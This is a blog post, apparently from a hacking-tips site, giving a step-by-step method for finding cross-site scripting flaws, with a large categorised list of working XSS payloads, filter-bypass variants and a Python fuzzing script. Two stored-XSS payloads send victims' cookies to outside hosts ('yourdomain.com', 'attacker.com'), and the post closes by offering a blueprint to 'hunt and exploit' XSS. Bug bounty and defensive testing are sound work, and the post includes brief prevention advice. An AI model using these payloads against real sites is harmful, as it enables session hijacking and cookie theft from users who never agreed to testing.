Bug Bounty / ctf-tools / Hacking tips / How to hack / Networking / Payloads / Reconnaissance

🛡️ A Guaranty Guide to Finding XSS Vulnerabilities (with Top Payloads)

spyboy's avatarPosted by

Cross-Site Scripting (XSS) is one of the most common and impactful web vulnerabilities, affecting countless websites, web apps, and APIs. Despite its age and extensive documentation, XSS continues to plague modern web infrastructure due to improper input sanitization, encoding, and contextual mishandling of dynamic content.

This post is not just another XSS primer. Instead, it’s a field-tested, guaranteed method to find XSS vulnerabilities, especially for bug bounty hunters, penetration testers, and cybersecurity researchers. You’ll also get a list of top XSS payloads that work across different contexts like HTML, JavaScript, attributes, and events.

🚨 What is XSS?

XSS (Cross-Site Scripting) allows attackers to inject malicious scripts into websites viewed by other users. The attacker can steal cookies, hijack sessions, perform actions on behalf of the user, redirect them, or even infect them with malware.

Three Types of XSS:

  1. Reflected XSS – Injected via URL, appears in the response immediately.
  2. Stored XSS – Stored on the server (e.g., in comments or chat) and executed when users load the page.
  3. DOM-based XSS – Vulnerability lies in client-side JavaScript handling untrusted data.

🔑 The Guaranty Method to Find XSS

There’s no magic wand, but this method will dramatically increase your chances of finding XSS in real-world applications.

✅ Step 1: Map All Input Vectors

  • Every input is a potential entry point. Look for:
    • URL parameters
    • POST form fields
    • JSON payloads
    • HTTP headers (especially User-Agent, Referer)
    • Cookies
    • WebSockets
    • Fragment identifiers (after #)
    • Multipart form uploads

Use tools like:

  • Burp Suite (with Burp Intruder, Logger++, Param Miner)
  • ffuf, Kiterunner, dirsearch
  • Browser DevTools (monitor network requests, JavaScript variables)

✅ Step 2: Reflect and Break

Send unique payloads to inputs and check for their reflections in:

  • HTML body
  • Attributes
  • Inline scripts
  • Event handlers
  • Inside <script>, <style>, JSON, XML, JavaScript variables

Use the following reflection probes:

"'><svg/onload=alert(1)> <script>alert('XSS')</script> <img src=x onerror=alert(1)>

Also, include random strings like xss12345 and search them in responses.

✅ Step 3: Contextual Awareness

Where your input lands matters:

ContextExamplePayload Strategy

HTML body<div>YOUR_INPUT</div>Use <script>, <img>

HTML attribute<input value="YOUR_INPUT">Use " to escape, then JS payload

JavaScript contextvar x = "YOUR_INPUT";Use ";alert(1);//

Event handler<button onclick="YOUR_INPUT">Inject valid JS

URL/JS concatwindow.location = "redirect.php?url=YOUR_INPUT"Try javascript:alert(1)

✅ Step 4: Test Stored and DOM-based XSS

🔄 Stored XSS:

  • Add comments, reviews, support tickets, or any persistent user content.
  • Reload the page and inspect where your payload appears.

🧠 DOM-based XSS:

  • Review client-side JavaScript:
    • Look for innerHTML, document.write, eval, location.hash, location.search, etc.
  • Use browser extension: DOM Invader

You can also use:

grep -R "innerHTML\|eval\|document.write" ./js/

✅ Step 5: Use XSS Hunters and Tools

  • XSS Hunter (or your custom payload catcher like requestbin, webhook.site)
  • XSStrike – Context-aware fuzzing
  • DalFox – Smart XSS scanner
  • KNOXSS, Burp Suite Pro scanner

💣 Top 15 XSS Payloads You Must Try

These are categorized by where the input lands. Mix, match, and tweak.

🔧 General Payloads

<script>alert(1)</script>
"><script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
<iframe src="javascript:alert(1)"></iframe>

🧩 HTML Attribute Payloads

" autofocus onfocus=alert(1) x="
' onmouseover=alert(1) a='
" onclick=alert(1) x="

🧠 JavaScript Context

";alert(1);// 
';alert(1)// 
</script><script>alert(1)</script>

🕵️ Obfuscated / Filter Bypass Payloads

<scr<script>ipt>alert(1)</scr</script>ipt>
<svg><script xlink:href="data:text/javascript,alert(1)"></script></svg>
<details open ontoggle=alert(1)>
<svg><g onload=alert(1)></g></svg>

🔄 Stored XSS Payloads (with Proof of Concept)

<script>fetch('https://yourdomain.com/?cookie='+document.cookie)</script>
<img src=x onerror="document.location='//attacker.com/?x='+document.cookie">

⚠️ DOM-based XSS Payloads

#<img src=x onerror=alert(1)>
?#<svg/onload=alert(1)>
#"><script>alert(1)</script>

Use tools like:

  • document.write(location.hash)
  • eval(location.search.slice(1))
  • innerHTML = decodeURIComponent(window.location.search)

🔐 How to Prevent XSS (Know Your Enemy)

If you’re testing your own apps or educating devs:

  • Escape contextually (HTML, JS, URL, attribute)
  • Use CSP (Content Security Policy)
  • Avoid innerHTML, eval, and dangerous DOM APIs
  • Auto-escape output in templates (React, Vue, Handlebars, etc.)
  • Validate input, but encode output always

🎯 Bonus: Automation Script Template

Here’s a Python + requests-based XSS test script:

import requests

url = "https://target.com/page"
payloads = ['<script>alert(1)</script>', '<img src=x onerror=alert(1)>']

for p in payloads:
    params = {"q": p}
    r = requests.get(url, params=params)
    if p in r.text:
        print(f"Possible XSS reflected: {p}")

🏁 Final Thoughts

XSS may be old, but it isn’t going anywhere. It’s one of the easiest bugs to find, yet often overlooked due to reliance on automation or underestimating context.

Remember:

  • Always think contextually.
  • Don’t trust filters blindly.
  • Test with creative, browser-tested payloads.
  • Use both manual and automated tools.

With the guide above, you now have a battle-tested blueprint to hunt and exploit XSS vulnerabilities.

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.